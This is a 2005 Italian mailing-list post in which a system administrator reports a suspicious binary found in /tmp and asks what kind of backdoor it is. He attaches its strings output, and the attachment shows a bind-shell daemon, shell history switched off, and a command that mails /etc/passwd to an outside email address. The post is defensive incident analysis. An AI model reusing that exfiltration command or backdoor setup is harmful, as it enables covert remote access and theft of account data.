--Signature_Wed__9_Nov_2005_15_41_21_+0100_Lanje9KcgOyTUXGN
Content-Type: multipart/mixed;
boundary=Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS
--Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Ciao a tutti,
ho trovato un file estremamente sospetto (/tmp/ownz), associato all'
utente nobody.
E' un file binario eseguibile e con strings s'=E8 rivelato essere una
backdoor, per=F2 non trovo informazioni su che tipo di backdoor sia e che
cosa faccia (a parte spedire ad un indirizzo email il passwd[1]).
Qualcuno ne sa qualcosa? in allegato trovate l'output di strings
Grazie, ciao
[1] Nota a parte, con il solo passwd, ma senza lo shadow... cosa se ne
pu=F2 fare?!?
--=20
Marco Bertorello System Administrator
Linux Registered User #319921 marco@bertorello.ns0.it
"Conoscere Bill Gates era il secondo dei miei sogni, il primo =E8 quello di
visitare Disneyland" - Arfa Karim
--Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS
Content-Type: text/plain; name=ownz.txt
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename=ownz.txt
/lib/ld-linux.so.2
SuSE
_Jv_RegisterClasses
__gmon_start__
libc.so.6
strcpy
waitpid
ioctl
printf
recv
execve
perror
dup2
system
socket
select
bzero
setpgid
send
alarm
accept
write
kill
bind
chdir
setsockopt
memchr
signal
read
listen
fork
memset
ntohs
strcmp
htons
atoi
_IO_stdin_used
_exit
__libc_start_main
strlen
open
setsid
close
getsockname
GLIBC_2.0
PTRh
TERM=3Dxterm
SHELL=3D/bin/bash
PS1=3D\[\033[1;30m\][\[\033[0;32m\]\u\[\033[1;32m\]@\[\033[0;32m\]\h \[\033=
[1;37m\]\W\[\033[1;30m\]]\[\033[0m\]#=20
HISTFILE=3D/dev/null
HOME=3D/var/tmp
PATH=3D/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:./bin:/=
var/tmp:/var/tmp/bin
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
/dev/null
Can't open a tty, all in use ?
Can't fork subshell, there is no way...
/var/tmp
/bin/sh
Can't execve shell!
USAGE: %s [PORT=3D1535]
:: Starting backdoor daemon ::
cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@gmail.com
socket
setsockopt
bind
listen
getsockname
Listening to port %d
FUCK: Can't fork child (%d)
:: Done, pid=3D%d ::
klogd
P554 SMTP=20
0wnz4ever
500 Error: bad syntax
.:: #rohack GROUP ::.
.:: Do not distrubute ::.
.:: by Zorg & seby_` ::.
--Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS
Content-Type: application/pgp-signature; name=
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogR251UEcgdjEuNC4xIChHTlUv
TGludXgpCgppRDhEQlFGRGNlbDVNRVV2MjE1SFpHQVJBbGJnQUo5NW5rK2Nha2k4WXNRVkdVdGdz
V3BxU2dFWHVBQ2ZTY3ZlCnJ3ZFNLcmRvZnIxZnpNTGZOM1lQWGQ4PQo9dzhFMAotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS
Content-Type: application/pgp-signature; name=
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogR251UEcgdjEuNC4xIChHTlUv
TGludXgpCgppRDhEQlFGRGNmRW9NRVV2MjE1SFpHQVJBcVZRQUo5eVdFZzRSR2Y1bTZGaTJnaU1Y
eXFjenJlZUdBQ2RGN1pkCmtwcXpPMGlXWnpwejE0T2NESE9aV0hBPQo9Q2dlYgotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Multipart_Wed__9_Nov_2005_15_41_21_+0100_Nx7cBUpS7SuVslkS--
--Signature_Wed__9_Nov_2005_15_41_21_+0100_Lanje9KcgOyTUXGN
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFDcgqUMEUv215HZGARAhbgAJ44GKrOx5lhra+ohPwFmbJNSOEECwCfUl4W
KZAPxSV/4r5razBfbTSjX+Y=
=hWRm
-----END PGP SIGNATURE-----
--Signature_Wed__9_Nov_2005_15_41_21_+0100_Lanje9KcgOyTUXGN--
_______________________________________________
Hackmeeting mailing list
Hackmeeting@inventati.org
https://www3.autistici.org/mailman/listinfo/hackmeeting
![[<--]](/icons/prev.gif){kind=icon}
![[-->]](/icons/next.gif){kind=icon}